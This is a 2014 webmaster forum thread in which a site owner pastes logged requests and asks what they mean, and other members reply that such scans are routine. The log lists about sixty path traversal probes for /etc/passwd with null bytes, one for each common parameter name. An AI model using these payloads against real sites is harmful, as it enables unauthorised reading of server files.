Greenguy's Board

Greenguy's Board (http://www.greenguysboard.com/board/index.php)
-   General Business Knowledge (http://www.greenguysboard.com/board/forumdisplay.php?f=10)
-   -   Hack Attack (http://www.greenguysboard.com/board/showthread.php?t=66936)

ecchi 2014-11-13 04:23 AM
Hack Attack
 
Just looked at my stats for yesterday on one of my blogs (http://genuinebondage.com/). There is a whole pile of hits to the main page carrying data for things that simply do not exist on my site. I'm guessing that they think it is Wordpress or similar and are trying to hack into the admin area. It is not, it is a script I wrote myself. But I would like to know what is going on. Can anyone tell from the following details what is happening (the attacks were on the main index page, my stats display everything in the URL after the domain name , IE "/?acion=../../../../../../../../../../etc/passwd%00 - 1" means one hit on http://genuinebondage.com/?acion=../../../../../../../../../../etc/passwd%00 ).

Quote:
/?acion=../../../../../../../../../../etc/passwd%00 - 1
/?act=../../../../../../../../../../etc/passwd%00 - 1
/?action=../../../../../../../../../../etc/passwd%00 - 1
/?API_HOME_DIR=../../../../../../../../../../etc/passwd%00 - 1
/?board=../../../../../../../../../../etc/passwd%00 - 1
/?cat=../../../../../../../../../../etc/passwd%00 - 1
/?client_id=../../../../../../../../../../etc/passwd%00 - 1
/?cmd=../../../../../../../../../../etc/passwd%00 - 1
/?cont=../../../../../../../../../../etc/passwd%00 - 1
/?current_frame=../../../../../../../../../../etc/passwd%00 - 1
/?date=../../../../../../../../../../etc/passwd%00 - 1
/?detail=../../../../../../../../../../etc/passwd%00 - 1
/?dir=../../../../../../../../../../etc/passwd%00 - 1
/?display=../../../../../../../../../../etc/passwd%00 - 1
/?download=../../../../../../../../../../etc/passwd%00 - 1
/?f=../../../../../../../../../../etc/passwd%00 - 1
/?file=../../../../../../../../../../etc/passwd%00 - 1
/?fileinclude=../../../../../../../../../../etc/passwd%00 - 1
/?filename=../../../../../../../../../../etc/passwd%00 - 1
/?firm_id=../../../../../../../../../../etc/passwd%00 - 1
/?g=../../../../../../../../../../etc/passwd%00 - 1
/?getdata=../../../../../../../../../../etc/passwd%00 - 1
/?go=../../../../../../../../../../etc/passwd%00 - 1
/?HT=../../../../../../../../../../etc/passwd%00 - 1
/?idd=../../../../../../../../../../etc/passwd%00 - 1
/?inc=../../../../../../../../../../etc/passwd%00 - 1
/?incfile=../../../../../../../../../../etc/passwd%00 - 1
/?incl=../../../../../../../../../../etc/passwd%00 - 1
/?include_file=../../../../../../../../../../etc/passwd%00 - 1
/?include_path=../../../../../../../../../../etc/passwd%00 - 1
/?infile=../../../../../../../../../../etc/passwd%00 - 1
/?info=../../../../../../../../../../etc/passwd%00 - 1
/?lang=../../../../../../../../../../etc/passwd%00 - 1
/?language=../../../../../../../../../../etc/passwd%00 - 1
/?link=../../../../../../../../../../etc/passwd%00 - 1
/?main=../../../../../../../../../../etc/passwd%00 - 1
/?mainspot=../../../../../../../../../../etc/passwd%00 - 1
/?msg=../../../../../../../../../../etc/passwd%00 - 1
/?num=../../../../../../../../../../etc/passwd%00 - 1
/?openfile=../../../../../../../../../../etc/passwd%00 - 1
/?p=../../../../../../../../../../etc/passwd%00 - 1
/?page=../../../../../../../../../../etc/passwd%00 - 1
/?pagina=../../../../../../../../../../etc/passwd%00 - 1
/?path_to_calendar=../../../../../../../../../../etc/passwd%00 - 1
/?pg=../../../../../../../../../../etc/passwd%00 - 1
/?plik../../../../../../../../../../etc/passwd%00 - 1
/?qry_str=../../../../../../../../../../etc/passwd%00 - 1
/?ruta=../../../../../../../../../../etc/passwd%00 - 1
/?safehtml=../../../../../../../../../../etc/passwd%00 - 1
/?section=../../../../../../../../../../etc/passwd%00 - 1
/?showfile=../../../../../../../../../../etc/passwd%00 - 1
/?side=../../../../../../../../../../etc/passwd%00 - 1
/?site_id=../../../../../../../../../../etc/passwd%00 - 1
/?skin=../../../../../../../../../../etc/passwd%00 - 1
/?static=../../../../../../../../../../etc/passwd%00 - 1
/?strona=../../../../../../../../../../etc/passwd%00 - 1
/?sub=../../../../../../../../../../etc/passwd%00 - 1
/?tresc=../../../../../../../../../../etc/passwd%00 - 1
/?url=../../../../../../../../../../etc/passwd%00 - 1
/?user=../../../../../../../../../../etc/passwd%00 - 1

Cleo 2014-11-13 09:05 AM
I see stuff like that on just about all my domains.

housekeeper 2014-11-14 02:40 PM
As Cleo said, those are pretty commonplace, but I would say more geared towards pay sites than blogs. To my knowledge they are php generated scripts that are just run randomly, I've never experienced problems with them over the years as they mainly target directories that don't exist, or try to pull random information.

ecchi 2014-11-18 03:18 PM
Thanks.


All times are GMT -4. The time now is 04:53 AM.

Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
© Greenguy Marketing Inc